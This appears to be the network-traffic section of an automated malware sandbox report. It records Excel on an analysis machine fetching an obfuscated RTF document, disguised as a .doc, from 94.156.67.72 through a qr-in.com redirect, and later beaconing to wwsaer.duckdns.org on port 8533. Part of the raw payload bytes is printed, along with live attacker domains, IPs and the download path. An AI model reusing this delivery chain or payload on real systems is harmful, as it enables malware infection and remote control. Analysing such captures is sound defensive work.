May 23, 2024 20:22:15.073107958 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:22:15.171334982 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:22:20.927473068 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:21.288342953 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:21.888365984 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:23.088428020 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:25.488584042 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:30.288901091 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:39.888456106 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:22:45.063025951 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:22:45.064208031 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:22:45.069108963 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:22:53.987406969 CEST	49164	80	192.168.2.22	188.114.96.3
May 23, 2024 20:22:53.987502098 CEST	49165	80	192.168.2.22	188.114.96.3
May 23, 2024 20:22:53.987606049 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:23:15.107801914 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:23:15.109004021 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:23:15.114157915 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:23:45.151437044 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:23:45.156579018 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:23:45.210932970 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:24:15.174567938 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:24:15.176964998 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:24:15.181993961 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:24:45.218420029 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:24:45.223254919 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:24:45.228743076 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:25:15.271591902 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:25:15.272864103 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:25:15.290884018 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:25:45.371443033 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:25:45.371895075 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:25:45.381915092 CEST	8533	49173	91.92.251.26	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 20:20:51.799896002 CEST	54562	53	192.168.2.22	8.8.8.8
May 23, 2024 20:20:51.830313921 CEST	53	54562	8.8.8.8	192.168.2.22
May 23, 2024 20:20:54.396055937 CEST	52917	53	192.168.2.22	8.8.8.8
May 23, 2024 20:20:54.614442110 CEST	53	52917	8.8.8.8	192.168.2.22
May 23, 2024 20:20:56.270772934 CEST	62751	53	192.168.2.22	8.8.8.8
May 23, 2024 20:20:56.285890102 CEST	53	62751	8.8.8.8	192.168.2.22
May 23, 2024 20:20:56.288355112 CEST	57893	53	192.168.2.22	8.8.8.8
May 23, 2024 20:20:56.324982882 CEST	53	57893	8.8.8.8	192.168.2.22
May 23, 2024 20:21:01.032942057 CEST	54821	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:01.056195021 CEST	53	54821	8.8.8.8	192.168.2.22
May 23, 2024 20:21:01.057789087 CEST	54719	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:01.127434015 CEST	53	54719	8.8.8.8	192.168.2.22
May 23, 2024 20:21:08.015712976 CEST	49881	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:08.116492033 CEST	54998	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:08.163175106 CEST	52781	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:09.611063957 CEST	63926	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:09.667346954 CEST	65510	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:12.556982994 CEST	62672	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:12.678985119 CEST	53	62672	8.8.8.8	192.168.2.22
May 23, 2024 20:21:14.335055113 CEST	56475	53	192.168.2.22	8.8.8.8
May 23, 2024 20:21:14.346271038 CEST	53	56475	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 20:20:51.799896002 CEST	192.168.2.22	8.8.8.8	0xfbb7	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:54.396055937 CEST	192.168.2.22	8.8.8.8	0x6a5f	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.270772934 CEST	192.168.2.22	8.8.8.8	0xb7a5	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.288355112 CEST	192.168.2.22	8.8.8.8	0x7e5	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.032942057 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.057789087 CEST	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	qr-in.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.015712976 CEST	192.168.2.22	8.8.8.8	0xa18e	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.116492033 CEST	192.168.2.22	8.8.8.8	0xf9fb	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.163175106 CEST	192.168.2.22	8.8.8.8	0x3d2f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:09.611063957 CEST	192.168.2.22	8.8.8.8	0xb9d4	Standard query (0)	f3rtrw.bl.files.1drv.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:09.667346954 CEST	192.168.2.22	8.8.8.8	0x46f6	Standard query (0)	f3rtrw.bl.files.1drv.com	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:12.556982994 CEST	192.168.2.22	8.8.8.8	0x9517	Standard query (0)	wwsaer.duckdns.org	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:14.335055113 CEST	192.168.2.22	8.8.8.8	0xae70	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 20:20:51.830313921 CEST	8.8.8.8	192.168.2.22	0xfbb7	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:51.830313921 CEST	8.8.8.8	192.168.2.22	0xfbb7	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:54.614442110 CEST	8.8.8.8	192.168.2.22	0x6a5f	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:54.614442110 CEST	8.8.8.8	192.168.2.22	0x6a5f	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.285890102 CEST	8.8.8.8	192.168.2.22	0xb7a5	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.285890102 CEST	8.8.8.8	192.168.2.22	0xb7a5	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.324982882 CEST	8.8.8.8	192.168.2.22	0x7e5	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:20:56.324982882 CEST	8.8.8.8	192.168.2.22	0x7e5	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.056195021 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.056195021 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.127434015 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	qr-in.com		188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:01.127434015 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	qr-in.com		188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.051455975 CEST	8.8.8.8	192.168.2.22	0xa18e	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.051455975 CEST	8.8.8.8	192.168.2.22	0xa18e	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.051455975 CEST	8.8.8.8	192.168.2.22	0xa18e	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.051455975 CEST	8.8.8.8	192.168.2.22	0xa18e	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.051455975 CEST	8.8.8.8	192.168.2.22	0xa18e	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.152309895 CEST	8.8.8.8	192.168.2.22	0xf9fb	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.152309895 CEST	8.8.8.8	192.168.2.22	0xf9fb	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.152309895 CEST	8.8.8.8	192.168.2.22	0xf9fb	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.152309895 CEST	8.8.8.8	192.168.2.22	0xf9fb	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.152309895 CEST	8.8.8.8	192.168.2.22	0xf9fb	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.215451956 CEST	8.8.8.8	192.168.2.22	0x3d2f	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.215451956 CEST	8.8.8.8	192.168.2.22	0x3d2f	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.215451956 CEST	8.8.8.8	192.168.2.22	0x3d2f	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:08.215451956 CEST	8.8.8.8	192.168.2.22	0x3d2f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:08.215451956 CEST	8.8.8.8	192.168.2.22	0x3d2f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:09.661979914 CEST	8.8.8.8	192.168.2.22	0xb9d4	No error (0)	f3rtrw.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:09.661979914 CEST	8.8.8.8	192.168.2.22	0xb9d4	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:09.703577995 CEST	8.8.8.8	192.168.2.22	0x46f6	No error (0)	f3rtrw.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:09.703577995 CEST	8.8.8.8	192.168.2.22	0x46f6	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 20:21:12.678985119 CEST	8.8.8.8	192.168.2.22	0x9517	No error (0)	wwsaer.duckdns.org		91.92.251.26	A (IP address)	IN (0x0001)	false
May 23, 2024 20:21:14.346271038 CEST	8.8.8.8	192.168.2.22	0xae70	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

qr-in.com

94.156.67.72

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	188.114.96.3	80	3172	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:51.852160931 CEST	323	OUT	GET /NAvSGzZ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qr-in.com Connection: Keep-Alive
May 23, 2024 20:20:52.967098951 CEST	1159	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 23 May 2024 18:20:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=k26rc8qnbjvktodgtgsp717o99; path=/ Set-Cookie: short_4348=1; expires=Thu, 23 May 2024 18:35:52 GMT; Max-Age=900; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex location: http://94.156.67.72/xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhrTxWBpGAt5pV6CF6rpEDHRuPeL8WEhNnb2U2Ko7aUs0u%2BvXS%2FIMBPrMAJjXHKWUNRkZb2H%2FtAD6PxtZcyBnrKJr87iCpDZ%2BZM0i%2FsPBInM%2BIpFTAJfCDS10cU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ffbdeb77c87-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	94.156.67.72	80	3172	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:52.989835024 CEST	467	OUT	GET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 94.156.67.72 Connection: Keep-Alive
May 23, 2024 20:20:53.629616976 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:20:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 23 May 2024 07:10:38 GMT ETag: "913a-61919bf834b98" Accept-Ranges: bytes Content-Length: 37178 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 66 69 6c 6c 44 7a 74 79 70 65 33 30 30 38 33 36 36 31 38 20 5c df 7d 0d 7b 5c 35 32 39 35 35 37 31 36 34 b5 21 33 26 2c 5b 39 25 2d 34 3f 7e 60 25 30 29 40 33 21 23 2e 7e 7e 30 3a 2f 3f 30 39 2f 3f 31 2e 30 24 2c 2a 3f 3f 3f 34 38 25 3a 7c 39 3b 40 40 2c 5f 7c 3c 27 25 29 2c 27 31 2b 3d 2e 36 25 24 37 b0 40 3f b0 39 38 34 3b a7 30 3e 7c a7 25 31 5e 38 5d 35 38 7e 5b 26 27 36 60 32 29 3f 36 23 3f 3d 2d 32 40 3c 3e 3b b0 5b 2a 36 27 38 2f 3a 23 35 32 2d 3a 2c 25 3b 3d 30 30 5b 3c 29 3f 3f 3f 23 3e 2d 38 27 2d 3f 23 21 a7 3c 7e 38 5d 25 2f 3f 2f 2e 7c 40 27 27 25 27 30 3f 27 39 5f 2e 24 40 36 30 b0 a7 35 3b 5b 2b 36 7c 29 60 25 5d 21 31 36 29 33 28 3f 37 26 5f 25 24 7c 27 7e 5e 3f 28 31 31 b0 2a 2f 37 34 3f 3f 25 32 23 38 25 2f 3f 7e 29 35 2c 2f 30 3f b5 35 32 3f 3f 3b 24 3e b0 5d 2b 27 3f 5e 7e 36 28 3f a7 24 38 29 2a 39 3b 3f 3e 5f 3f a7 25 33 37 3f 5b a7 35 3f 33 28 38 28 2f 7e 3a 23 32 5b 36 3f 26 2b 25 7c 3f 38 36 21 35 28 33 3f 21 [TRUNCATED] Data Ascii: {\rt{\\fillDztype300836618 \}{\529557164!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,???48%:\|9;@@,_\|<'%),'1+=.6%$7@?984;0>\|%1^8]58~[&'6`2)?6#?=-2@<>;[6'8/:#52-:,%;=00[<)???#>-8'-?#!<~8]%/?/.\|@''%'0?'9_.$@605;[+6\|)`%]!16)3(?7&_%$\|'~^?(11/74??%2#8%/?~)5,/0?52??;$>]+'?^~6(?$8)9;?>_?%37?[5?3(8(/~:#2[6?&+%\|?86!5(3?!8-(5$%&-%[('%/?43-\|6\|/>?&??5:;'[+59&;9!>\|@[(??8]]35???`?5+!<[%<3?~6@?89/=>(=?<+6??5~)5:$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.??8-1%?6'=9?\|!~1__7):/0'(?:(&'?]($/)7%5\|+28(&/<,;?_($84#/7%+?8)~$`3#,.])-3/2_?<.?%>.?.4=?%87?0[?51#_4.#^(39`@~?~~\|@66=`@0%~#?)?-!7_#?$<3[%2\|)<9&<??'8;%]?1?[2,'[5;5(??@[2%?=5??@5$(!=?~!\|3?~``!)?3#05.~62$?</+>.56;/<?,%;97('-8:?@2(?,>22^?732`4/[7/(%66_=)(]0645-6-,4`?45_\|9(2$1$??4(-\|#?9???:.0;:.49;\|&?.6/./?[,0#-/24\|%<+,=%[#5?;!?-4='-%437(&$]99[1@?.:?8?6.9'+?<5.~+?>),?(:\|79@8??[51?<9?]-;;(@&4)2/^8(]67('!9$$3:`&2~'3
May 23, 2024 20:20:53.629635096 CEST	224	IN	Data Raw: 3c 3a 2a 3f 2e 2a 24 24 b0 5f 3f 3d 3f 2d 3f 3f a7 2f a7 7c 21 2a 26 31 5e 23 3c 34 39 5f 3e 35 30 3f 5e b5 3f 5f 3f 35 2c 5f 23 23 23 3b 23 5e 3a 7e 2a 32 31 40 b5 3f 3d 2d 33 40 21 23 5f 21 3a 25 3c 34 3d 38 7e 3a 7c 5d 3d 28 21 27 2d 5e b5 2f Data Ascii: <:?.$$_?=?-??/\|!&1^#<49_>50?^?_?5,_###;#^:~21@?=-3@!#_!:%<4=8~:\|]=(!'-^/@.-?+%2]7]@4~0-?00!&=)4?~`_:1:'%22#@/5<]@-%(#@0838\|]0,7?,#/<-~~/#:!/_/?6?~?4~9;5,??7-\|_((?'*?'-,<3?:`(&[0`6#&?@?\|>`>-_$~>\|0<!,6<`
May 23, 2024 20:20:53.630474091 CEST	1236	IN	Data Raw: 36 36 30 3f 26 23 38 3f 3e 37 5d 24 5b 3f 2d 32 3b 3a 5e 28 32 3f 2b 3b 5d a7 5d 3a 3d 3c 38 b0 2c 2f 3f 3b 25 30 5e 3f 30 5d 3f 7e 38 7e 30 25 36 28 2a 3d 39 3d 5f 5e 26 36 3c 3b a7 33 24 3f 25 2a 2c 2a 31 2b 3e 3e 23 3e 30 3f 2d 3c 2d 3b 5e 24 Data Ascii: 660?&#8?>7]$[?-2;:^(2?+;]]:=<8,/?;%0^?0]?~8~0%6(=9=_^&6<;3$?%,1+>>#>0?-<-;^$>[3%.@&[5[+%6!:@&$)@9@]2`7??#9,?+$@~&?_[:.`>&)8-??=7)26!\|,%@6`'>8=_,$^2~\|^+?1693/:^)_-?-?%2=16;&=\|?2+.85\|(1/(<3&^+48`&=~']\|%25?8\|#8=>-4??>&.(
May 23, 2024 20:20:53.630503893 CEST	1236	IN	Data Raw: 3f 27 30 2a 2c 32 40 25 37 2d 5e 38 32 5d 2a 3a 3f 31 33 2a 5b 25 3b 3b 39 32 31 35 3d 28 29 37 3f 39 30 31 32 5b 7e 21 25 28 2c 3f 2c 3e 38 b0 3f 5d 3f 39 31 23 36 21 29 3f 28 2b b0 31 21 3f 5d b0 38 26 21 33 b5 37 a7 b0 3f 5e 5b 3b 21 38 24 2a Data Ascii: ?'0,2@%7-^82]:?13[%;;9215=()7?9012[~!%(,?,>8?]?91#6!)?(+1!?]8&!37?^[;!8$:?5?,'?[1\|%?;_?#7/?-9??]-_?`_<\|?+#<\|_9\|^^16/?7]:_4??&1?0]&'_1548?.3`3@%1!9%1]3)?=?!~;%7^&>`.&?'\|6\|@??2@?[-6?);#'&(:?/?]>!>6?326?7]'=:](5<?%;2+2!16\|8&
May 23, 2024 20:20:53.630515099 CEST	448	IN	Data Raw: 21 23 7e 3d 31 25 3f 3b 29 40 32 a7 3f 3f 39 3f 5b 7c b5 3d 2a 29 38 30 60 2f 28 26 3d 33 3c 21 39 36 38 36 5e 5b 60 23 3b 2c 38 3d 37 36 3f 7c 37 3f 3b 29 5e 60 3a 3d b0 33 3b 2b 3f 33 3d 3b 34 3f 5d 40 a7 3f 26 35 32 3b b0 5e a7 40 60 2e 29 39 Data Ascii: !#~=1%?;)@2??9?[\|=)80`/(&=3<!9686^[`#;,8=76?\|7?;)^`:=3;+?3=;4?]@?&52;^@`.)9?694`5]4`4'597!??4(?=?%3%]9.&&8.7?=[:?4\|^<$%$:\|3?=`[@:1+\|?9&>>'?#.1]*$0`8?8?(8@?,1'1?4%?`_9?&#?3?#?]$<9?>:_?3^+$',%>1;<@2;4`8(&/&';^?;~?;,+'$_#6;);%~$?$
May 23, 2024 20:20:53.631341934 CEST	1236	IN	Data Raw: 3f 2b 3a b0 3f 3f 29 25 60 25 3f 3f 29 a7 b0 24 5e 2b 32 5d 25 34 40 5e 39 3f b0 7c 5f 24 21 3f 2f b0 23 60 26 3e 38 60 33 3f 23 2a 3f 3d 27 2e 36 27 7c 31 37 2d 32 29 32 b5 33 5e 3f 28 2b 7e 3b 36 3f 5b 30 3d b0 31 39 2b 25 32 2b 2b 21 2d 3b 3f Data Ascii: ?+:??)%`%??)$^+2]%4@^9?\|_$!?/#`&>8`3?#?='.6'\|17-2)23^?(+~;6?[0=19+%2++!-;?\|@##2&<:%^~\|\|17?].+^[?.`2=']=-'6=?:?.&9?$~=6]48)%^/7\|?\|:5[??!'<^~^!#:9@[?=%1>%??/@?6%!#.?\|4#<,@(>4[~`#</'?'.[>14%2'2?_<3?>%<;5@.5#%?4?/%!^;=!0
May 23, 2024 20:20:53.631355047 CEST	1236	IN	Data Raw: 30 34 37 5c 27 ef 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: 047\'{\object\MF
May 23, 2024 20:20:53.632226944 CEST	1236	IN	Data Raw: 0d 0d 0d 0a 0a 0a 0a 38 62 0d 0d 0a 0d 0a 0d 0a 0a 31 36 38 20 09 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 09 09 62 31 20 09 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 09 09 61 62 0a 0d 0a 0a 0a 0a 0a 0a 38 66 39 38 Data Ascii: 8b168 b1 ab8f98 0 1 e 0d2d 491
May 23, 2024 20:20:53.632241964 CEST	1236	IN	Data Raw: 09 09 20 20 09 09 20 09 20 09 20 20 09 20 20 20 20 09 33 20 20 20 20 20 09 09 20 20 09 09 20 09 20 09 20 20 09 20 20 20 20 09 65 37 20 09 20 20 09 20 20 20 09 20 20 20 09 20 20 20 20 09 20 20 20 20 09 30 09 09 09 09 09 09 20 09 09 20 09 20 09 20 Data Ascii: 3 e7 0 6346f 8 49 05 b5cd97037f
May 23, 2024 20:20:53.632255077 CEST	1236	IN	Data Raw: 0a 0d 0a 0a 0a 39 20 09 20 20 20 20 09 20 09 09 09 09 09 20 20 20 20 20 09 20 20 09 09 33 0a 0a 0d 0a 0d 0a 0a 0a 31 20 20 20 09 20 20 09 09 09 20 20 20 09 20 20 09 20 20 09 20 20 09 09 38 0d 0a 0d 0a 0d 0a 0a 0a 63 63 09 09 09 09 09 09 09 20 09 Data Ascii: 9 31 8cc c ed6 10242cfac d 44486
May 23, 2024 20:20:53.639336109 CEST	1236	IN	Data Raw: 20 09 20 09 20 20 09 09 62 0d 0a 0d 0d 0d 0d 0a 0a 61 32 30 09 20 09 09 09 20 09 09 09 20 20 20 09 09 09 20 09 20 09 20 20 09 09 33 0d 0d 0a 0d 0a 0a 0d 0a 35 20 20 09 09 09 09 20 09 20 20 09 09 20 20 20 09 20 20 09 20 20 09 09 64 35 20 09 20 20 Data Ascii: ba20 35 d5 780 505d cb5994 659 7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49163	188.114.96.3	80	3460	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:54.629136086 CEST	153	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: qr-in.com Content-Length: 0 Connection: Keep-Alive Cookie: short_4348=1
May 23, 2024 20:20:55.165565014 CEST	742	IN	HTTP/1.1 405 Not Allowed Date: Thu, 23 May 2024 18:20:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2BT0ydQHhOG%2BCC9asQrvPDVRYrZyCowBwaH70GEG4H%2FW3TCpmqOujySCk98MAkp8cveU%2BoEdxNBF6BduQLAZo8KRZPDlIrh%2FcpDywxu2XDjE4s90HqMeEY%2FFuXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8887100c0a020f6c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49164	188.114.96.3	80	3460	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:20:55.478600979 CEST	153	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: qr-in.com Content-Length: 0 Connection: Keep-Alive Cookie: short_4348=1
